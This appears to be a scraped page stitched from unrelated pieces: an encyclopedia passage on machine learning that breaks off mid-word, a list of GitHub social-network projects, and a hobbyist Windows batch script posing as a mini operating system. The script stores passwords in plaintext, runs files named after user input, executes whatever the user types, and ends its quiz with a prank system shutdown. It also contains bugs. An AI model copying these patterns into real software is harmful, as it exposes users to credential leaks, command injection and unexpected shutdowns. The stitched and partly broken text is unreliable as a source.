behavior analytics In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million.[76] Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.[77] In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis.[78] In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software.[79] In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists.[80] In 2019 Springer Nature published the first research book created using machine learning.[81] Limitations Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results.[82][83][84] Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems.[85] In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision.[86] Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested.[87][88] Bias Main article: Algorithmic bias Machine learning approaches in particular can suffer from different data biases. A machine learning system trained on current customers only may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on man-made data, machine learning is likely to pick up the same constitutional and unconscious biases already present in society.[89] Language models learned from data have been shown to contain human-like biases.[90][91] Machine learning systems used for criminal risk assessment have been found to be biased against black people.[92][93] In 2015, Google photos would often tag black people as gorillas,[94] and in 2018 this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data, and thus was not able to recognize real gorillas at all.[95] Similar issues with recognizing non-white people have been found in many other systems.[96] In 2016, Microsoft tested a chatbot that learned from Twitter, and it quickly picked up racist and sexist language.[97] Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains.[98] Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "There’s nothing artificial about AI...It’s inspired by people, it’s created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility.”[99] Model assessments Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2/3 training set and 1/3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy.[100] In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC).[101] Ethics Machine learning poses a host of ethical questions. Systems which are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices.[102] For example, using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants against similarity to previous successful applicants.[103][104] Responsible collection of data and documentation of algorithmic rules used by a system thus is a critical part of machine learning. Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases.[105][106] Other forms of ethical challenges, not related to personal biases, are more seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is huge potential for machine learning in health care to provide professionals a great tool to diagnose, medicate, and even plan recovery paths for patients, but this will not happen until the personal biases mentioned previously, and these "greed" biases are addressed.[107] Hardware Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of non-linear hidden units.[108] By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI.[109] OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months.[110][111] Software Software suites containing a variety of machine learning algorithms include the following: Free and open-source so
matomo-org / Searchengine And Social ListList of Search engines URLs, keywords and Social network URLs definitions used by Matomo Analytics
abilian / Abilian SbeAbilian Social Business Engine - an enterprise social networking / collaboration platform.
sinscary / Flask Social NetworkingThis is a Small Social Networking website developed using Flask and Peewee. It uses Jinja-2 templating engine.
omnixent / Omnixent👀 A simple API that allows you to understand what people search on search engines, social networks, etc.
igor-alexandrov / RblogPowerful and fast Ruby on Rails blog engine with some elements of social network.
nvbn / Djang0byteLightweight social networks engine written in python+django, that aims to bear great workloads.
red-gold / Telar Social GoTelar Social Engine is a scalable cloud native social network. Whatever your creative idea or unique bussiness model, you can build it by Telar running on any public or private cloud.
IDzUp / PH4Social:mega: Social Networking Software built with Laravel PHP framework and Bootstrap.
bridgetownrb / Bridgetown Seo TagA Bridgetown plugin to add metadata tags for search engines and social networks to better index and display your site's content.
hashkat / Hashkat#k@ is a dynamic network simulation tool designed to model the growth of and information propagation through an online social network. It is an agent-based, Kinetic Monte Carlo engine capable of simulating online networks such as Facebook, Twitter, LinkedIn, etc.
The-Assembly / Real Time OCR Text To Speech With TesseractTesseract is a cross-OS optical character recognition (OCR) engine developed by HP in the 1980s, and since 2006, maintained by Google as an open-source project with high marks for accuracy in reading raw image data into digital characters. The project has been continuously developed and now offers OCR supported by LSTM neural networks for highly improved results. In this session, we’ll use the Python wrapper for Tesseract to first test drive OCR on images through code before connecting our solution to a live IP video feed from your smartphone processed through OpenCV, and then translating the resultant text stream into audible form with gTTS (Google Text-To-Speech), enabling our mashup program to automatically read out loud from any script it ‘sees’. Prerequisites: —Python IDE such as PyCharm (https://www.jetbrains.com/pycharm) —The Tesseract engine (https://tesseract ocr.github.io/tessdoc/Home.html) —A smartphone configured as an IP Webcam (https://www.makeuseof.com/tag/ip-webcam-android-phone-as-a-web-cam/) ----------------------------------------- To learn more about The Assembly’s workshops, visit our website, social media or email us at workshops@theassembly.ae Our website: http://theassembly.ae Instagram: http://instagram.com/makesmartthings Facebook: http://fb.com/makesmartthings Twitter: http://twitter.com/makesmartthings #OCR #TextToSpeech #Tesseract
codersclub / Discuz.MLDiscuz!ML is a multilingual version of Discuz!X, social network engine from Tencent Cloud
deeppavlov / Dialog Flow EngineDialog Flow Engine (DFE) allows you to write conversational services. The service is written by defining a special dialog graph that describes the behavior of the dialog service. The dialog graph contains the dialog script. DFE offers a specialized language (DSL) for quickly writing dialog graphs. You can use it in such services for writing skills for Amazon Alexa and etc, chat-bots for social networks, websites call-centers and etc.
Mastercoder-hacker / M.bat@echo off color 1b cls @echo off color 1b cls set /p "A=>Password:" cls if %A%==moon goto desktop1 goto password :desktop1 cls color 0a cls echo. echo Date: %date% Time: %time% echo echo 1)Write text file. echo 2)Documents... echo 3) Info echo 4) Calculator echo 5) Notepad (open in your main Windows OS) echo 6) Close Windows Basic Edition echo 7) Open Google (Quick way) echo 8) Open The Folder Containing This Package (Quick way) echo 9) randomness echo 10) matrix echo 11) Open Info (In a message box) echo 12) CreateABatch.zip echo 13) OPEN C: echo 14) open D: echo 15) open E: echo 16) open F: echo 17) open g: echo 18) OS echo 19) SITES echo 20) OPEN PASSWORD GENERATOR echo 21) OPEN WEBSITE PINGER echo 22) OPEN CMD ACCOUNT echo 23) START GAME echo 24) OPEN EXTRA SITES set /p menuselect= if %menuselect% == 1 goto write if %menuselect% == 2 goto docs if %menuselect% == 3 goto info if %menuselect% == 4 goto calc if %menuselect% == 5 goto notepad if %menuselect% == 6 goto close if %menuselect% == 7 goto google if %menuselect% == 8 goto packageinfolder if %menuselect% == 9 goto random if %menuselect% == 10 goto randomtwo if %menuselect% == 11 goto openinfoinmsgbox if %menuselect% == 12 goto batch if %menuselect% == 13 goto c if %menuselect% == 14 goto d if %menuselect% == 15 goto e if %menuselect% == 16 goto f if %menuselect% == 17 goto g if %menuselect% == 18 goto desktop2 if %menuselect% == 19 goto desktop3 if %menuselect% == 20 goto desktop4 if %menuselect% == 21 goto desktop5 if %menuselect% == 22 goto desktop6 if %menuselect% == 23 goto desktop7 if %menuselect% == 24 goto desktop8 pause :c start c: pause :d start d: pause :e start e: pause :f start f: pause :g start g: pause :write cls echo Welcome to Write, an application which let's you write text files... echo What will be the name of your text? set /p writeone= Name: cls echo Ok, your file has been created. Have fun! pause cls set /p textone= pause echo You will be going back to the desktop pause goto desktop1 :docs cls echo 1)%writeone% echo 2)%writetwo% echo 3)%writethree% set /p browse= if %browse% == 1 goto textone if %browse% == 2 goto texttwo if %browse% == 3 goto textthree :textone cls echo %writeone% echo %textone% pause goto desktop1 :Installd11 ECHO THIS FILE IS MADE BY MURDHANYA PATHAK>>Menud11.txt pause :texttwo cls echo %writetwo% echo %texttwo% pause goto desktop1 :textthree cls echo %writethree% echo %textthree% pause goto desktop1 :info echo Windows Basic Edition (Shows Coding) echo Created by MURDHANYA PATHAK pause goto desktop1 :calc cls set /p equ= set /a equ=%equ% cls echo %equ% pause goto desktop1 :notepad START /MAX C:\Windows\NOTEPAD.EXE :close close :google START CHROME www.google.com pause :bootscreentwo goto bootscreen pause :random echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% echo %random% pause :randomtwo echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% pause goto desktop1 :Install echo THIS DOCUMENT's OWNER IS MURDHANYA PATHAK>>Menu.txt PAUSE :openinfoinmsgbox msg * Windows Basic Edition (Shows Coding) Created by MURDHANYA PATHAK pause :batch cls echo Welcome to Project Folder Creator. echo Will create the following folder: echo %foldername% echo If this is okay, pause cls set foldername=Project_ONE md %foldername% cd %foldername% md cache cd cache md proxies cd.. md footage cd footage md img seq cd.. md preview md projectfiles md references md renders cd renders md passes cd.. cls cd.. start %foldername% cd %foldername% echo Batch Complete! tree pause :desktop2 @echo off cls color 0a cls cls set /p "D=>Password:" cls if %D% ==pass goto desktop21 pause :desktop21 color0a cls echo. echo Date: %date% Time: %time% echo echo 1) INSTALL OS echo 2) Start OS set /p menuselect= if %menuselect% == 1 goto Installos if %menuselect% == 2 goto os2 pause :Installos @echo off color 0a title Installer :ask1 cls echo. echo Please enter the Product ID for the OS set /p "id=>" if %id%==space@123 goto ask2 goto ask1 :ask2 cls echo Please enter your Product Key set/p "id=>" if %id%==15042008 goto ask3 goto ask2 :ask3 cls echo Please enter your password which will be for the OS. set /p "PASS=>" goto Installosd21 goto Installosd22 :Installosd21 cls echo. echo Your OS will start in hindi. echo Wizard is installing your OS. echo. echo @echo off >"OS.bat" echo color 0a >>"OS.bat" echo title OS >>"OS.bat" echo :username >>"OS.bat" echo cls >>"OS.bat" echo set /p "USER=>Username:-" >>"OS.bat" echo goto password >>"OS.bat" echo cls >>"OS.bat" echo :password >>"OS.bat" echo cls >>"OS.bat" echo set /p "A=>Password:" >>"OS.bat" echo cls>>"OS.bat" echo if %A%==%PASS% goto menu >>"OS.bat" echo goto password >>"OS.bat echo cls >>"OS.bat" echo :menu >>"OS.bat" echo findstr /v "moon" Menu.txt >>"OS.bat" echo set /p "B=>" >>"OS.bat" echo if %B%==1 edit >>"OS.bat" echo if %B%==2 ipconfig pause >>"OS.bat" echo if %B%==3 exit >>"OS.bat" echo goto menu >>"OS.bat" :Installosd22 cls echo. echo Press 1 to edit >>"Menu.txt" echo Press 2 to open IP Config >>"Menu.txt" echo Press 3 to exit >> "Menu.txt" echo Your software is installed now. start OS.bat pause>nul :os2 start OS.bat pause :desktop3 @echo off cls cls set /p "E=>Password:" cls if %E% ==pass goto desktop31 pause :desktop31 color 0a cls echo 1) Main Isro site by space echo 2) MY OWN BLOG echo 3) MY ISRO BLOG echo 4) MY YOUTUBE PAGE set /p menuselect= if %menuselect% == 1 goto spacesite if %menuselect% == 2 goto myblog1 if %menuselect% == 3 goto isroblog if %menuselect% == 4 goto myyoutubepage pause :spacesite start CHROME https://www.sites.google.com/view/isro-by-murdhanya pause :myblog1 start CHROME https://www.moon1504.blogspot.com pause :isroblog start CHROME https://www.moonisro.blogspot.com pause :myyoutubepage start CHROME https://https://www.youtube.com/channel/UCZ61L4oREBQpdUT4sm7GBvQ pause :desktop4 set /p "G=>Password:" cls if %G% ==pass goto desktop41 pause :desktop41 @echo off :Start2 cls goto Start :Start title Password Generator echo I will make you a new password. echo Please write the password down somewhere in case you forget it. echo --------------------------------------------------------------- echo 1) 1 Random Password echo 2) 5 Random Passwords echo 3) 10 Random Passwords echo Input your choice set input= set /p input= Choice: if %input%==1 goto A if NOT goto Start2 if %input%==2 goto B if NOT goto Start2 if %input%==3 goto C if NOT goto Start2 :A cls echo Your password is %random% echo Now choose what you want to do. echo 1) Go back to the beginning echo 2) Exit set input= set /p input= Choice: if %input%==1 goto Start2 if NOT goto Start 2 if %input%==2 goto Exit if NOT goto Start 2 :Exit exit :B cls echo Your 5 passwords are %random%, %random%, %random%, %random%, %random%. echo Now choose what you want to do. echo 1) Go back to the beginning echo 2) Exit set input= set /p input= Choice: if %input%==1 goto Start2 if NOT goto Start 2 if %input%==2 goto Exit if NOT goto Start 2 :C cls echo Your 10 Passwords are %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random% echo Now choose what you want to do. echo 1) Go back to the beginning echo 2) Exit set input= set /p input= Choice: if %input%==1 goto Start2 if NOT goto Start 2 if %input%==2 goto Exit if NOT goto Start 2 pause :desktop5 set /p "H=>Password:" cls if %H% ==pass goto desktop51 pause :desktop51 :A @echo off Title Website Pinger color 0e echo Enter the website you would like to ping set input= set /p input= Enter your Website here: if %input%==goto A if NOT B echo Processing Your request ping localhost>nul echo ------------------------------------------------------------------------------------- echo If you do not clost this in 45 seconds you will go to **ENTER WEBSITE HERE** echo ------------------------------------------------------------------------------------- ping localhost>nul echo This is the IP= ping %input% set input= set /p input= If you want to open this adress please enter the IP here: start iexplore.exe %input% set input2= set /p input2= if %input% exit goto exit ping localhost -n 45 >nul start iexplore.exe **ENTER WEBSITE HERE** pause :desktop6 set /p "I=>Password:" cls if %I% ==pass goto desktop61 pause :desktop61 @echo off :home title Log in to CMD color 07 cls echo. echo Cmd Accounts echo ============= echo. echo [1] Log In echo [2] Sign Up echo [3] Exit echo. set /p op= if %op%==1 goto 1 if %op%==2 goto 2 if %op%==3 goto 3 goto error :2 cls echo Sign Up echo ====================================== echo. set /p newname="Enter new username:" if "%newname%"=="%newname%" goto inputname :inputname cd "%userprofile%\documents" if exist "cmdacoBin" goto skip if not exist "cmdacoBin" goto noskip :noskip md "cmdacoBin" goto skip :skip cd "%userprofile%\documents\cmdacoBin" if exist "%newname%.bat" goto namexist if not exist "%newname%.bat" goto skip2 :skip2 echo set realusername=%newname%> "%newname%.bat" goto next :next echo. set /p pswd=Enter new Password: if "%pswd%"=="%pswd%" goto inputpass :inputpass cd "%userprofile%\documents\cmdacoBin" echo set password=%pswd%>> "%newname%.bat" goto next1 :namexist echo. echo The entered username already exists. echo Press any key to return. . . pause >nul goto 2 :next1 cls echo Cmd Accounts echo ============ echo. echo Your account has been successfully created! echo. pause goto home :1 color 07 cls echo Cmd Accounts Log In echo ================================ echo. Set /p logname=Username: if "%logname%"=="%logname%" goto 2.1 :2.1 echo. set /p logpass="Password:" if "%logpass%"=="%logpass%" goto login :login cd "%userprofile%\documents\cmdacoBin" if exist "%logname%.bat" goto call if not exist "%logname%.bat" goto errorlog :call call "%logname%.bat" if "%password%"=="%logpass%" goto logdone goto errorlog :errorlog color 0c echo. echo Username or Password incorrect. echo Access denied. pause >nul goto home :logdone cls echo Command Prompt echo ============== echo. echo Successfully logged in! echo. pause goto account :account cls cd "%userprofile%\documents\cmdacoBin" call "%realusername%color.bat" call "%realusername%.bat" color %colorcode% cls echo. echo ------------------------------------------------------------------------------- echo %realusername% echo ------------------------------------------------------------------------------- @echo off break off Title Command Prompt color 0a cls echo Type "home" any time to go to the current user profile directory. echo Type "desktop" any time to go to the current user desktop. echo. echo Type help to see list of common commands like cd, rd, md, del, echo ren, replace, copy, xcopy, move, attrib, tree, edit, and cls. echo Type [command]/? for detailed info. echo. pause cls :cmd echo Directory: %CD% set /P CMD=Command: if "%CMD%" == "cls" goto cls if "%CMD%" == "home" goto home2 if "%CMD%" == "desktop" goto desktop if "%CMD%" == "red" goto red if "%CMD%" == "green" goto green if "%CMD%" == "normal" goto normal %CMD% cd C:\ goto cmd :cls cls goto cmd :home2 cd /d %USERPROFILE% cls goto cmd :desktop cd /d %SystemDrive%\Users\%USERNAME%\Desktop cls goto cmd :red color 0c cls goto cmd :green color 0a cls goto cmd :normal color 07 cls goto cmd pause :desktop7 set /p "J=>Password:" cls if %J% ==pass goto desktop71 pause :desktop71 @echo off color 1a :menus cls echo -------------------------------------------Welcome To Question Game!--------------------------------------------------- ping localhost -n 2 >nul echo Please Choose Choose Number From List And Then Press Enter. ping localhost -n 2 >nul echo List: Type 1 To Play Game. Type anything To See How To Play This Game. set /p make= if %make%==1 goto Play if %make%==2 goto How :how cls echo Just Type The Number Of The Answer And Press Enter. pause goto menus :Play cls echo Enter Your Name: set /p names= echo Hi %names%! ping localhost -n 2 >nul echo Lets Start With Level 1. ping localhost -n 2 >nul :LEVEL1 cls echo What Is 8x4 ping localhost -n 2 >nul echo 1. 36 ping localhost -n 2 >nul echo 2. 35 ping localhost -n 2 >nul echo 3. 32 set /p right=So What You Choose? if %right%==1 goto w1 if %right%==2 goto w1 if %right%==3 goto r1 :w1 cls echo Sadly That Is Wrong %names% ping localhost -n 2 >nul echo Try Again? (Y/N) set /p k= if %k%==y goto LEVEL1 if %k%==n goto sure1 :r1 cls echo Countralagations! Thats Right %names%! ping localhost -n 2 >nul echo Do You Want To Go Level 2 %names%? (Y/N) set /p g= if %g%==y goto LEVEL2 if %g%==n goto sure1 :sure1 cls echo Are You Sure To Go Menu? (Y/N) echo WARNING: Game Will Start Again If You Go To Menu. echo Note: NO GAME SAVES OR LOADS!!! set /p um1= if %um1%==y goto menus if %um1%==n goto LEVEL2 :LEVEL2 cls echo What Is The Best Thing To Do When Tornado Is Close To You? ping localhost -n 2 >nul echo 1. Go To A Car And Open All Windows. ping localhost -n 2 >nul echo 2. Lie Flat As Possible. ping localhost -n 2 >nul echo 3. Climb To A Tree. set /p z= if %z%==1 goto w2 if %z%==2 goto r2 if %z%==3 goto w2 :r2 cls echo Its Right %names%! Good Job! ping localhost -n 2 >nul echo Want Play Level 3 %names%? (Y/N) set /p gg= if %gg%==y goto LEVEL3 if %gg%==n goto sure2 :w2 cls echo Sadly that is wrong. echo Try Again %names%? (Y/N) set /p ok= if %ok%==y goto LEVEL2 if %ok%==n goto sure2 :sure2 cls echo Are You Sure To Go Menu? (Y/N) echo WARNING: Game Will Start Again If You Go To Menu. echo Note: NO GAME SAVES OR LOADS!!! set /p um= if %um2%==y goto menus if %um2%==n goto LEVEL3 :LEVEL3 cls echo How Many People In Finland Has? ping localhost -n 2 >nul echo 1. Mayby Up To: 5,500,100 ping localhost -n 2 >nul echo 2. Mayby: Up To: 7,400,500 ping localhost -n 2 >nul echo 3. Mayby: 4,600,300 set /p nsl= if %nsl%==1 goto r3 if %nsl%==2 goto w3 if %nsl%==3 goto w3 :r3 cls echo Amazing %names%! ping localhost -n 2 >nul echo Want To Go Level 4? (Y/N) set /p yep= if %yep%==y goto LEVEL4 if %yep%==n goto sure3 :w3 cls echo Sadly That Is Wrong %names% :( echo Try Again? (Y/N) set /p ll= if %ll%==y goto LEVEL3 if %ll%==n goto sure3 :sure3 cls echo Are You Sure To Go Menu? (Y/N) echo WARNING: Game Will Start Again If You Go To Menu. echo Note: NO GAME SAVES OR LOADS!!! set /p um= if %um3%==y goto menus if %um3%==n goto LEVEL4 :LEVEL4 cls echo Which Is The Most Abundant Metal In The Earth`s crust? ping localhost -n 2 >nul echo 1. Aluminum ping localhost -n 2 >nul echo 2. Iron ping localhost -n 2 >nul echo 3. Nickel set /p cp= if %cp%==1 goto r4 if %cp%==2 goto w4 if %cp%==3 goto w4 :w4 cls echo Your Computer Understands That. Windows Dosent Know The Answer Too. ping localhost -n 4 >nul echo Lets Try Again! goto LEVEL4 :r4 cls echo The Computer Mayby Blows Up Because You Are Too Good %names%! ping localhost -n 4 >nul echo Press 1 To Continue. . . set /p con= if %con%==1 goto LEVEL5 :LEVEL5 cls ping localhost n- 2 >nul echo What Is The Largest Country In The World? ping localhost n- 2 >nul echo 1. Canada ping localhost -n 2 >nul echo 2. Europe ping localhost -n 2 >nul echo 3. Russia set /p fingame= if %fingame%==1 goto w5 if %fingame%==2 goto w5 if %fingame%==3 goto r5 :r5 cls echo OH NO! YOUR PC BLOWS UP SHUT DOWN!!!! YOU ARE TOO GENIUS!!!!! %names%!!!!! ping localhost -n 4 >nul echo GAME COMPLETED! ping localhost -n 2 >nul start shutdown /s /t 30 /c "YOUR PC GETS SHUTDOWNED BECAUSE YOU ARE TOO GENIUS!!!!!!!!" :w5 echo Windows: OMG! Good That You Dont Know That %names%!!! :O ping localhost -n 2 >nul echo CMD: NOPE... Try Again? (Y/N) ping localhost -n 2 >nul echo Windows: NOOOOOOOOOOOOOO!!!!!!! %names%!!!!!!!!!!!! set /p LTRY= if %LTRY%==y goto LEVEL5 if %LTRY%==n goto sure5 :sure5 cls echo Are You Sure To Go Menu? (Y/N) echo WARNING: Game Will Start Again If You Go To Menu. echo Note: NO GAME SAVES OR LOADS!!! set /p um55= if %um55%==y goto menus if %um55%==n goto LEVEL5 pause :desktop8 set /p "H=>Password:" cls if %H% ==pass goto desktop81 pause :desktop81 @echo off echo *************************************************************** echo. echo Site Selector echo. echo *************************************************************** echo. echo Key: echo [1] Google - Search Engine echo [2] Hotmail - Mail Server echo [3] Yahoo - Search Engine/Mail Server echo [4] Facebook - Social Networking echo [5] Myspace - Social Networking echo [6] CNN - News echo [7] Weather - Weather echo [8] WikiHow - A How-To Website echo [9] Instructables - A How-To Website echo [10] YouTube - Online Videos echo [11] Answers - Online Encyclopedia echo [12] Wikipedia - Online Encyclopedia echo [13] Yandex - Email echo [14] GhostMail - Email echo [15] Zoho - Email echo [16] Penzu - Online Journal echo [17] OneDrive - Online File Storage echo [18] Elgoog - Google Terminal echo [19] CodeBeautify - Encryption echo [20] InfoEncrypt - Encryption echo. echo [e] Exit echo. echo *************************************************************** echo Enter the number of the website which you would like to go to: echo. set /p udefine= echo. echo *************************************************************** if %udefine%==1 start www.google.com if %udefine%==2 start www.hotmail.com if %udefine%==3 start www.yahoo.com if %udefine%==4 start www.facebook.com if %udefine%==5 start www.myspace.com if %udefine%==6 start www.cnn.com if %udefine%==7 start www.weather.com if %udefine%==7 start www.wikihow.com if %udefine%==9 start www.instructables.com if %udefine%==10 start www.youtube.com if %udefine%==11 start www.answers.com if %udefine%==12 start www.wikipedia.com if %udefine%==13 start www.yandex.com if %udefine%==14 start www.ghostmail.com if %udefine%==15 start www.zoho.com if %udefine%==16 start www.penzu.com if %udefine%==17 start www.onedrive.com if %udefine%==18 start www.elgoog.im/terminal if %udefine%==19 start www.codebeautify.org/encrypt-decrypt if %udefine%==20 start www.infoencrypt.com if %udefine%==e goto exit cls echo *************************************************************** echo. echo Thank You for using Site Selector by Blurryface21 echo. echo *************************************************************** echo Type [e] to exit or [b] to go back and select another site. echo. set /p udefine= echo. echo *************************************************************** if %udefine%==b goto top if %udefine%==e goto exit :exit cls echo *************************************************************** echo. echo Thank You for using Site Selector by Blurryface21 echo. echo *************************************************************** pause exit